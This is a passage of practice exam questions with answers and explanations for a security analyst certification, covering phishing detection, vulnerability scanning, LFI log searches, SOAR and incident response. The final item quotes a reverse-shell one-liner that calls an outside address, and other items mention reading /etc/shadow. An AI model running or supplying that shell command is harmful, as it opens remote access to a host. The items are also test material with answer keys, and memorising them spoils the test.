C. A new VPN gateway has been deployed.
D. A social engineering attack is underway.
Correct Answer: D
The URL “https://office365password.acme.co” does not match the standard VPN logon page “www.acme.com/logon,”
A security analyst is performing vulnerability scans on the network. The analyst installs a scanner appliance, configures the subnets to scan, and begins the scan of the network. Which of the following would be missing from a scan performed with this configuration?
A. Operating system version
B. Registry key values
C. Open ports
D. IP address
Correct Answer: B
A vulnerability scan performed by a scanner appliance on a network typically focuses on identifying vulnerabilities related to open ports, services, and known software vulnerabilities. It may also gather information about the operating system versions running on target hosts. However, registry key values are specific to Windows operating systems and are not typically part of a standard vulnerability scan. Registry information is typically not directly exposed or accessible via network scanning, so it’s not a common target for such scans.
A security analyst discovers an LFI vulnerability that can be exploited to extract credentials from the underlying host. Which of the following patterns can the security analyst use to search the web server logs for evidence of exploitation of that particular vulnerability?
A. /etc/shadow
B. curl localhost
C. ; printenv
D. cat /proc/self/
Correct Answer: A
Local File Inclusion (LFI) is a web security vulnerability that occurs when an attacker tricks a web application into including files from the local server.
If an attacker successfully exploits an LFI vulnerability to extract credentials from the underlying host, one way they might attempt to access sensitive files is by trying to access the “/etc/shadow” file. The “/etc/shadow” file on Unix-based systems like Linux contains the hashed passwords of users.
A company receives a penetration test report summary from a third party. The report summary indicates a proxy has some patches that need to be applied. The proxy is sitting in a rack and is not being used, as the company has replaced it with a new one. The CVE score of the vulnerability on the proxy is a 9.8. Which of the following best practices should the company follow with this proxy?
A. Leave the proxy as is.
B. Decomission the proxy.
C. Migrate the proxy to the cloud.
D. Patch the proxy.
Correct Answer: B
Proxy Not in Use: Since the proxy is sitting in a rack and is not being used, it’s not actively serving any purpose. Keeping unused and unpatched systems in the network can pose security risks.
High CVE Score (9.8): The vulnerability on the proxy has a high Common Vulnerability Scoring System (CVSS) score of 9.8. Such a high score indicates a critical vulnerability with the potential for severe impact. Leaving it unpatched would expose the company to significant risk.
Security Best Practices: Security best practices recommend promptly addressing vulnerabilities, especially those with high scores. Decommissioning the proxy ensures that it’s removed from the network, eliminating the risk associated with the unpatched vulnerability.
In summary, decommissioning the unused proxy is the most prudent course of action to mitigate security risks.
A company is in the process of implementing a vulnerability management program. Which of the following scanning methods should be implemented to minimize the risk of OT/ICS devices malfunctioning due to the vulnerability identification process?
A. Non-credentialed scanning
B. Passive scanning
C. Agent-based scanning
D. Credentialed scanning
Correct Answer: B
Passive scanning is a method of vulnerability identification that does not send any packets or probes to the target devices, but rather observes and analyzes the network traffic passively. Passive scanning can minimize the risk of Operational Technology (OT)/Industrial Control Systems (ICS) devices malfunctioning due to the vulnerability identification process, as it does not interfere with the normal operation of the devices or cause any network disruption. Passive scanning can also detect vulnerabilities that active scanning may miss, such as misconfigured devices, rogue devices or unauthorized traffic.
An analyst is examining events in multiple systems but is having difficulty correlating data points. Which of the following is most likely the issue with the system?
A. Access rights
B. Network segmentation
C. Time synchronization
D. Invalid playbook
Correct Answer: C
Given the scenario, the most likely issue with the system is C. Time synchronization.
When events are logged across multiple systems, accurate timestamps are crucial for correlation.
If the system clocks are not synchronized, it can lead to discrepancies in event timelines, making it difficult to correlate data points effectively.
Ensuring consistent time synchronization across systems is essential for accurate analysis and incident response.
An analyst recommends that an EDR agent collect the source IP address, make a connection to the firewall, and create a policy to block the malicious source IP address across the entire network automatically. Which of the following is the best option to help the analyst implement this recommendation?
A. SOAR
B. SIEM
C. SLA
D. IoC
Correct Answer: A
SOAR (Security Orchestration, Automation, and Response): SOAR platforms are designed to streamline security operations by integrating various security tools, automating workflows, and orchestrating incident response processes. They allow analysts to create playbooks that automate repetitive tasks, including blocking malicious IP addresses. By collecting data from EDR agents, SOAR platforms can trigger automated actions, such as creating firewall rules to block the identified threat across the network.
SIEM (Security Information and Event Management): While SIEM systems are essential for collecting and analyzing security logs, they are primarily focused on monitoring and detection. SIEMs provide visibility into security events but do not directly automate actions like blocking IP addresses.
SLA (Service Level Agreement): SLAs define the expected level of service between parties (e.g., an organization and a vendor). They are not directly related to implementing security recommendations or automating threat response.
**IoC (Indicator of Compromise): **IoCs are specific artifacts (such as IP addresses, domains, hashes) associated with security threats. While IoCs are crucial for threat intelligence, they do not provide the automation capabilities needed to block malicious IP addresses.
Remember that SOAR platforms combine automation, orchestration, and incident response, making them the most suitable choice for implementing the analyst’s recommendation.
Which of the following describes the best reason for conducting a root cause analysis?
A. The root cause analysis ensures that proper timelines were documented.
B. The root cause analysis allows the incident to be properly documented for reporting.
C. The root cause analysis develops recommendations to improve the process.
D. The root cause analysis identifies the contributing items that facilitated the event.
Correct Answer: D
The root cause analysis identifies the contributing items that facilitated the event. **It helps uncover the underlying factors that led to an incident, allowing organizations to address vulnerabilities and prevent similar events in the future. **
By understanding the root cause, effective corrective actions can be taken to improve processes and prevent recurrence.
An end-of-life date was announced for a widely used OS. A business-critical function is performed by some machinery that is controlled by a PC, which is utilizing the OS that is approaching the end-of-life date. Which of the following best describes a security analyst’s concern?
A. Any discovered vulnerabilities will not be remediated.
B. An outage of machinery would cost the organization money.
C. Support will not be available for the critical machinery.
D. There are no compensating controls in place for the OS.
Correct Answer: A
As an operating system reaches its end-of-life date, the vendor typically stops providing security updates and patches for known vulnerabilities.
This leaves systems running on the outdated OS exposed to potential security risks. Without the ability to receive patches, any vulnerabilities discovered in the OS after the end-of-life date will remain unaddressed, increasing the risk of exploitation by malicious actors. This concern highlights the importance of migrating critical systems to supported and up-to-date platforms to mitigate security risks.
While options B, C, and D may also be concerns for the organization, the primary focus of a security analyst is typically on mitigating security risks, making option A the best choice.
A security analyst identified the following suspicious entry on the host-based IDS logs:
bash -i >& /dev/tcp/10.1.2.3/8080 0>&1
Which of the following shell scripts should the analyst use to most accurately confirm if the activity is ongoing?
A. #!/bin/bash
nc 10.1.2.3 8080 -vv >dev/null && echo “Malicious activity” || echo “OK”
B. #!/bin/bash
ps -fea | grep 8080 >dev/null && echo “Malicious activity” || echo “OK”
C. #!/bin/bash
ls /opt/tcp/10.1.2.3/8080 >dev/null && echo “Malicious activity” || echo “OK”
D. #!/bin/bash
netstat -antp | grep 8080 >dev/null && echo “Malicious activity” || echo “OK”
Correct Answer: D
The suspicious entry bash -i >& /dev/tcp/10.1.2.3/8080 0>&1 appears to be an attempt to establish a reverse shell connection to the IP address 10.1.2.3 on port 8080.
Option A:
* This script uses nc (netcat) to connect to 10.1.2.3 on port 8080.
* If the connection is successful, it echoes “Malicious activity”; otherwise, it echoes “OK.”
* However, this script doesn’t directly verify the suspicious command.
* Not the best choice for confirming ongoing activity related to the suspicious entry.
Option B:
* This script uses ps -fea to list all processes and then pipes the output to grep 8080.
* If any process with port 8080 is found, it echoes “Malicious activity”; otherwise, it echoes “OK.”
* While it checks for processes, it doesn’t specifically validate the suspicious command.
* Not the most accurate choice for confirming ongoing activity related to the suspicious entry.
Option C:
* This script attempts to list the contents of a non-existent directory (/opt/tcp/10.1.2.3/8080).
* It will likely fail and always echo “OK.”
* Definitely not the right choice for confirming the suspicious activity.
Option D:
* This script uses netstat -antp to display active network connections.
* It then pipes the output to grep 8080 to check for any connections on port 8080.
* If a connection exists, it echoes “Malicious activity”; otherwise, it echoes “OK.”
* Best choice among the given options for confirming ongoing activity related to the suspicious entry.
Therefore, the security analyst should use Option D to accurately confirm whether the suspicious activity is ongoing. This script checks for active connections on port 8080, which aligns with the suspicious command.